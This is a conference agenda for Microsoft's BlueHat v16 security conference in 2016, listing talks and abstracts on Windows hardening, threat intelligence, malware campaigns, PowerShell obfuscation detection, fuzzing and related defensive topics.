The BlueHat conference is dedicated to educate Microsoft engineers and executives on current and emerging security threats, to help them address security issues in Microsoft products and services and protect customers. BlueHat serves as a great opportunity for us to bring the brightest minds in the security ecosystem together to discuss and tackle some of the biggest challenges facing the industry today.
BlueHat v16 General Sessions
November 3-4, 2016
Microsoft Conference Center
16070 NE 36th St, Redmond, WA 98052
Please keep an eye on our BlueHat Blog as we will release more information and previews for BlueHat v16.
External Attendance at BlueHat Conference is by invitation only. All invited attendees will receive an email with registration link and conference agenda in September.
Thursday, November 3rd, 2016
9:00 - 9:50 AM | TBD | TBD | Keynote
Track 1 - Opening
10:00 - 10:50 AM | Alex Weinert and Dana Kaufman | Microsoft
Identity Protection at scale - A Year in the Trenches with Microsoft Identity Protection team
Microsoft is one of the largest identity providers in the world. Between Microsoft account, Microsoft’s consumer system which supports Outlook, Xbox, OneDrive, and more; and Azure Active Directory, which supports virtually all enterprise identity deployments, Microsoft’s Identity team supports more than 2B identities in every market and services over 14B logins every day. The Identity Protection team is responsible for ensuring that access is granted only to account owners, and that those account owners are not fraudsters. In this session, we’ll provide an overview of the protection systems in play, including our new Azure Active Directory Identity Protection product, how we see fraudsters adapting to different protection systems, and industry trends in a world where the high stakes attacks meet high tech adaptive countermeasures. We’ll punctuate the talk with a few scary stories front lines, and our forecast for the future of identity protection.
11:00 - 11:50 AM | Daniel Edwards and Stirling McBride | Microsoft
Threat Intelligence Systems
The new buzzword on the street is Threat Intelligence. What exactly is threat intelligence? How does a piece of data go from ordinary data to threat intelligence? This talk will first walk you through the process of taking data and producing Threat Intelligence and then how one might integrate such a data source into their service.
Track 1 - Threat Landscape
1:00 - 1:50 PM | Peter Hlavaty | Tencent
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Past few years our team was focusing on different operating systems including Microsoft windows kernel. Honestly our first pwn at Windows kernel was not that challenging. Number of available targets with friendly environment for straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose ideal attack surface from various sandboxes. In addition, what steps to follow for digging security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose: e.g choose “unknown” one which hasn’t been researched before; Select well fuzzed or well audited one, or research on kernel module internals to find “hidden” attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside with cost of tricks around to choose seemingly banned targets, illustrated by notable examples.
After getting hands on potential bug available from targeted sandbox, it is time for Microsoft windows taking hardening efforts to put attacker into corner. Strong mitigations are being introduced more frequently than ever, with promising direction which cuts lots of attack surface off, and a several exploitation techniques being killed. We will show difficulties of developing universal exploitation techniques, and demonstrate needed technical level depending on code quality of target. We will examine how different it becomes with era of Redstone and following versions even with those techniques and good vulnerability in hand. How it changed attacker landscape and how it will (and will not) kill those techniques and applications. However will it really change the game or not?
2:00 - 2:50 PM | Genghis Karimov | Microsoft
Win32k Security Improvements: Past & Present
Win32k is large subsystem of the Windows OS responsible for UI, graphics and input tasks. Having been part of most Windows releases, from Windows 3.x to Windows 10, the Win32k subsystem teaches a unique lesson in managing a large codebase through its natural growth, from the perspective of reliability and security. This talk chronicles the codebase through out the major releases; how macro and micro design decisions within the component translate to security risk; what famous attacks Win32k vulnerabilities were leveraged for. Most of the discussion will be dedicated to technical overview of Win32k-specific vulnerabilities and the mitigations for them.
3:00 - 3:50 PM | Jessy Campo and Thomas Dupuy | ESET
Visiting the Bear Den
Sednit, a.k.a. Fancy Bear/APT28/Sofacy, is a group of attackers operating since at least 2006 and whose main objective is to steal confidential information from specific targets. Over the past two years, this group's activity increased significantly, in particular with numerous attacks against foreign affairs ministries and embassies all over the world. Technically speaking, Sednit is probably one of the best espionage group out there. Not only have they created a complex software ecosystem -- composed of tens of different components --, but they also regularly come out with 0-day exploits. Also remarkable is their ability to very quickly integrate newly published techniques in their toolkit. This talk presents the results of a two-year hunt after Sednit, during which we dug up and analyzed many of their software. In particular, we will delve into technical details of their most impressive components:
During our tracking, we also gained a great visibility on Sednit post-infection modus operandi, a world full of Mimikatz and various custom hacking tools.
4:00 - 4:50 PM | Cooper Quintin | Electronic Frontier Foundation
I Got a Letter From the Government the Other Day... Unveiling a Campaign of Intimidation, Kidnapping, and Malware in Kazakhstan
This report covers a campaign of phishing and malware which we have named “Operation Manul” and which, based on the available evidence, we believe is likely to have been carried out on behalf of the government of Kazakhstan against journalists, dissidents living in Europe, their family members, known associates, and their lawyers. Many of the targets are involved in litigation with the government of Kazakhstan in European and American courts whose substance ranges from attempts by the government of Kazakhstan to unmask the administrators behind an anonymous website that publishes leaks alleging government corruption (Kazaword) to allegations of kidnapping.
Our research suggests links between this campaign and other campaigns that have been attributed to an Indian security company called Appin Security Group. A hired actor is consistent with our findings on the Command and Control servers related to this campaign, which included web-based control panels for multiple RATs, suggesting that several campaigns were being run at once. A hired actor may also explain the generic and uninspired nature of the phishing, which often took the form of an email purporting to contain an invoice or a legal document with an attachment containing a blurry image. This talk will cover the report in detail. We will also go into detail about the often low-tech, unsophisticated attack methods which are commonly used against journalists and dissidents, and what security researchers and defenders at microsoft and elsewhere can do to stop these sorts of attacks and keep people safe from authoritarian governments.
Friday, November 4th, 2016
Track 1 - The Cloud
9:00 - 9:50 AM | Satoshi Tanda and Ahmed Samy | Sophos
Hypervisors in Your Toolbox: Monitoring and Controlling System Events with HyperPlatform
Virtualization software has been extensively used for security research, and countless of analysis systems based on virtualization technology (VT) have been invented for more than a decade. Regardless, there is no suitable hypervisor as a platform to develop such VT-based analysis systems on Windows. Lightweight hypervisors for Windows lack support of modern platforms, and comprehensive, consumer-oriented hypervisors and emulators are either overly intricate to quickly take advantage of VT or excessively slow for day-to-day usage. This talk presents HyperPlatform, a thin hypervisor designed as a VM-exit filtering platform for Windows. Using Intel VT-x and extended page tables, this platform provides researchers ability to flexibly handle a new class of system events and rapidly implement hypervisor-based tools with high compatibility and efficiency. In this talk will also introduce some HyperPlatform-based tools with live demo against real malware demonstrating various example application scenarios of HyperPlatform.
10:00 - 10:50 AM | Saruhan Karademir | Microsoft
Breaking Things Early: Designing Secure Containers
In Windows Server 2016, we introduced Windows Server Containers – a modern way to deploy software. This allows our internal and external customers to leverage the Windows platform in the new ‘cloud’ architecture model of microservices and continuous integration. Along with Windows Server Containers, we also introduced Hyper-V Containers, which has a strictly enforced isolation boundary that’s purpose-built for hostile multi-tenant scenarios. Hosting and utilizing containers is a large part of Azure’s future strategy, including components such as the Azure Container Service and AzureML. The Windows Container platform also lays the foundation of many future features in client and server Windows. Because of the critical nature of this feature, WDG Security Assurance embedded its members into the development process of Windows Containers. This new approach integrated security knowledge into the design and implementation of the features themselves, moving the bar for how security teams should collaborate with feature teams.In this talk, we will discuss the architecture of Windows Containers and highlight the differences between the Hyper-V containers and Windows Server Containers. This will include a comparison of the threat model between the two flavors as well as a deeper look at the changes made to Hyper-V. In addition, we will present the details about our embedded security partnership with the feature teams that helped build Containers. We will show the resulting impact of this collaboration by diving into specific design changes. This will include changes in the user model of Windows Containers as well as the Xenon storage subsystem.
11:00 - 11:50 AM | Pete Loveless and Fred Aaron | Microsoft
In-memory compromise detection as an Azure service
Security analysis of Azure crash dumps is a new Azure threat detection service, and in this talk we’ll explore some of the most sophisticated malware it's found. We’ll present an overview of how our service runs in Azure, and explain where the dumps we’re analyzing come from. We’ll explain in detail some of the key behavioral attributes our service looks for in order to detect malicious activity, for example: PEB locator functionality used in shellcode to access core Windows APIs, reflective injection using reflective loaders, custom PE or stripped MZ headers, and process hollowing. We’ll describe a few examples of malware we've found that demonstrate the very behaviors and attributes our service is designed to detect. Finally, we’ll discuss ways in which the security community can collaborate with us to help us build even better detections that help Azure and Azure customers defend against security threats.
11:30 - 11:55 AM | Michael Scovetta and Jan Vandenbos | Microsoft
Security of Open Source at Microsoft
Microsoft uses a vast and increasing number of open source components to deliver products and services to customers. These components provide enormous value, but introduce some significant security risk. During this session, we'll cover the following challenges and how we're addressing them: * How exposed are Microsoft products and services to vulnerabilities present in open source components? * What security work should engineers be doing when using open source? * Which metrics can be used to indicate the risk inherited when using an open source component? * How well do available security tools find actionable vulnerabilities? * How can machine learning and related approaches be used to identify security risk across many projects, including detection of intentional backdoors in open source components? * How do we handle responsible disclosure when critical vulnerabilities are found in open source components? We'll conclude with a demo of some tooling available today and present a few of the notable vulnerabilities found through the processes created.
Track 1 - Exploit, Perry, Strike
1:00 - 1:50 PM | Haifei Li | Intel Security
All the Weird Things I've Found on Office
In this presentation, I will talk about the weird issues I've found when researching into Microsoft Office applications, as well as some of my thoughts about Office security. The issues I will talk about include (but may not limit to): 1) The BadWinmail (CVE-2015-6172) bug in Outlook. 2) The Protected Mode bypass issue via XLA (CVE-2016-3279). 3) A Protected Mode bypass issue in the "cloud" world. 4) A critical vulnerability in VBA Engine (even when VBA macros are disabled). 5) An Outlook "dead loop" issue. I hope this talk will shed some light on security research on Microsoft Office, which is quite important for the overall enterprise security.
2:00 - 2:50 PM | Yunhai Zhang | NSFOCUS
How to Avoid Implement An Exploit Friendly JIT
3:00 - 3:50 PM | Daniel Bohannon | Mandiant
Invoke-Obfuscation: Powershell obFUsk8tion Techniques & How To (Try To) D""e'Tec'T 'Th'+'em'
The very best attackers hide their PowerShell commands from A/V and application whitelisting technologies using encoded commands and memory-only payloads. These techniques thwart Blue Teams from determining what was executed on a target system. However, network defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
This talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. As I share these techniques I will emphasize the value each technique provides the attacker. Next, I will introduce three new layers of obfuscation that can be applied independently or collectively to any PowerShell command. These layers include: 1) directly manipulating PowerShell and .Net cmdlets, functions and arguments, 2) string manipulation applied to single commands or entire scripts, and 3) PowerShell command input parameters that enable one to hide command line arguments from appearing for powershell.exe.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not or can not enable these features. Therefore, I will provide techniques the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will also highlight methods using C# within powershell.exe that enable the attacker to execute .Net functions without being recorded in PowerShell event logs. Additionally I will discuss ways to perform remote downloads via SendKeys and ComObjects. I will conclude this talk by highlighting the public release of Invoke-Obfuscation.ps1. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line detection mechanisms.
4:00 - 4:50 PM | David Weston, Matt Miller and Peleus Uhley | Microsoft/Adobe
A Year of Hardening Adobe Flash Player
Adobe Flash Player has become a preferred target for browser-based attacks over the past year and a half. In response to this shift, Adobe, Microsoft, and Google have collaborated on hardening Adobe Flash Player to make it more difficult for attackers to find and exploit Flash Player vulnerabilities. In this presentation, we’ll analyze the timeline and trends related to attacks against Flash Player and describe the hardening improvements that have been made along the way. We’ll show how attackers have responded to these improvements and conclude with a summary of what the landscape looks like today.
Track 2 - Discovery
9:00 - 9:50 AM | Alex Ionescu | Crowdstrike
Gaining Visibility into Linux Binaries on Windows - How to defend and understand WSL
The release of the Windows Subsystem for Linux (WSL) brings exciting new changes to the Windows ecosystem -- the ability to run unmodified Linux ELF Binaries in an environment that provides a 75%+ system call compatibility layer with the Linux Kernel API/ABI, access to sockets, the file system, pipes, and a private driver/IPC bus mechanism, all while leveraging the DrawBridge "Pico Process" research. At the same time, today's defense products and engines are not adapted to this reality. Forensically difficult to understand, poorly internally documented outside of some technical blog posts, and unusual-by-design (ELF binaries utilizing a kernel driver for I/O, leveraging poorly understood NTFS features), WSL is a great place for future attackers to invade, if the blue team doesn't get there first.
This presentation will expose some of the difficulties in dealing with WSL processes for forensics, IR, and endpoint detection and response. It will also call out certain undisclosed risks and actual vulnerabilities, regarding file system EoP attacks, mitigation bypasses, system call vulnerabilities, and bugs regarding Windows handle usage. As future Windows releases increase the capabilities of WSL, it's important to address these issues systematically with fuzzing, SDL processes, and a better understanding of the risks and interactions between NT and Linux. Finally, we'll provide ideas & suggestions for how security-minded vendors and administrators can get some visibility into WSL.
10:00 - 10:50 AM | Andrea Allievi and Richard Johnson | Microsoft/Cisco Systems
Harnessing Intel Processor Trace on Windows for Vulnerability Discovery
This talk will explore Intel Processor Trace, the new hardware branch tracing feature included in Intel Skylake processors. We will explain the design of Intel Processor trace and detail how the current generation implementation works including the various filtering modes and output configurations.
This year we designed and developed the first opensource Intel PT driver for the Microsoft Windows operating system. We will discuss the architecture of the driver and the large number of low level programming hurdles we had to overcome throughout the development of the driver to program the PMU, including registering Performance Montering Interrupts (PMI), locating the Local Vector Table (LVT) Performance Monitor timer register, bypassing the TLB and cache through managing physical memory, and more. We will demonstrate the usage of Intel PT in Windows environments for diagnostic and debugging purposes and then discuss how we've harnessed this branch tracing engine for guided fuzzing.
This year we have added the Intel PT tracing mode as an engine for targeting Windows binaries in the widely used evolutionary fuzzer, American Fuzzy Lop. This fuzzer is capable of using random mutation fuzzing with a code coverage feedback loop to explore new areas. Using our new Intel PT driver for Windows, we provide the fastest hardware supported engine for targeting binaries with evolutionary fuzzing. In addition we have added new functionality to AFL for guided fuzzing, which allows users to specify targeted areas on a program control flow graph that are of interest. This can be combined with static analysis results or known-vulnerable locations to help automate the creation of trigger inputs to reproduce a vulnerability without the limits of symbolic execution. To keep performance as the highest priority, we have also created new methods for efficiently encoding weighted graphs into an efficiently comparable bytemap.
11:00 - 11:25 AM | Casey Smith | Veris Group ATD
Trusted Things That Execute
As organizations are embracing the new whitelisting model, it becomes imperative to understand what applications you trust. Solutions such as AppLocker, and DeviceGuard go a long way to provide increased defense. However, attackers can leverage existing, default, signed tools to execute arbitrary code. This talk will describe multiple utilities that have been discovered to execute code in unexpected ways. The methods we use do not rely on exploitation at all. In fact they follow recommended patterns for developers. The purpose of this talk is to inform defenders, as well as provide insight into uncovering these patterns at scale.
11:30 - 11:55 AM | John Booth | Microsoft
Detecting Malicious Masquerading Processes
Every year thousands of organizations are victims of cyber-attacks leading to potential misuse of their resources, loss of billions of records and damage to their reputation. The attacker will typically run malicious code on victim machines to collect data, control the machine or for other common purposes. One way to achieve this is to drop a malicious binary with a name similar to that of a common process; the attacker intent is to go unnoticed by the analyst human eye. Another option is to inject malicious code into an existing process making the malicious code appear to be running as part of a legitimate process. In this talk, we will discuss a method to scan a large amount of windows process creation event data to detect some of the attacker tactics above. We suggest a scoring model to decide which processes to present to the analyst as suspicious, and show how we’ve applied this work to internal and customer data.
Track 2 - Landscape Reaction
1:00 - 1:50 PM | Michiko Short | Microsoft
Windows Credential Protections: Where are we now?
To understand how to protect against credential theft & lateral traversal attacks (Pass-the-Hash), we need to understand the conditions required for credential theft. Then it is easy to see how the various Windows and Domain Controller features address various parts of the problem.
2:00 - 2:50 PM | Rohit Kapoor, Murali Puthanveetil and Vinay Prabhushankar | Microsoft
Threat Modeling at Cloud Speed - Queryable & Composable Threat Models
As security engineers, we have all created & reviewed several Threat models. Ask yourself if the following situations seem familiar:
Solution: The CRM team has built a tool to address the above needs. We have been using it for Threat model reviews with positive feedback from our feature teams. In this talk, we cover the following: 1. A demo of how the tool addresses the above scenarios. 2. An architectural overview of the system's key pieces (Relational Store, Drawing Engine, Web Front end) 3. How to prototype and onboard to the system.
3:00 - 3:25 PM | Jon DeHart | Microsoft
Redesigning the Edge with Just-In-Time Network Access
With the development of built-in application layer security on the rise, so must come advances in network security. The antiquated model of edge based access control via firewall is proving to be more taxing on network administrators and less maintainable as asset footprint increases. In order to combat this, network security must be brought back down to the host layer, and firewalls must be re-engineered to act as central command for users and groups while taking advantage of standard OS security functionality. This talk will conceptually discuss the opportunity to replace edge firewalls with request based ACL changes managed by a centralized logic engine.
3:30 - 3:55 PM | Marianne Malle and Patrick Estavillo | Microsoft
Ransomware Threat Landscape and Retrospect
In 2016 alone, ransomware campaigns have become even more prominent, showing more activity than was seen in the past few years. For this BlueHat session, we will share some key summaries about what has happened in the ransomware threat landscape over the last 10 months, and how it continues to be a growing problem for customers. As part of this, we will focus a portion of the presentation on a deep-dive on top ransomware families which have been steadily on the rise for the past months. We will also explore methods of delivery, variant updates, and behaviors that these threats exhibit. At the end of this talk, we will also share insight about current research and response efforts, as well as future plans on our fight against ransomware versus ransomware infection, how we can mitigate against these threats and recommendations when faced with these types of threats.
4:00 - 4:50 PM | David Molnar | Microsoft
Fuzzing Cloud "Project Springfield"
Fuzzing is an effective method for finding security bugs, but getting results is tricky because it needs expertise, machine power, and process changes to deploy. "Project Springfield" packages Microsoft's best practices, combined with a decade of research into machine reasoning and "Whitebox fuzzing," into a cloud service that makes it easy to rapidly deploy fuzzing across an organization. Come hear how Microsoft customers and internal teams have embraced the cloud to gain scale, speed, and unique technology for finding serious security bugs -- and how you can do he same. Learn lessons from building and operating a fuzzing platform that aims to help everyone, everywhere, test their security critical code. The talk will start with an overview of the Project Springfield cloud platform, including a demonstration of the web front end and an SDK for integration. The talk will then focus on a guided discussion of future directions for fuzzing - we want to hear from attendees what they need and what would work for them! Attendees will come away with a Project Springfield account to let them experiment with cloud fuzzing at home.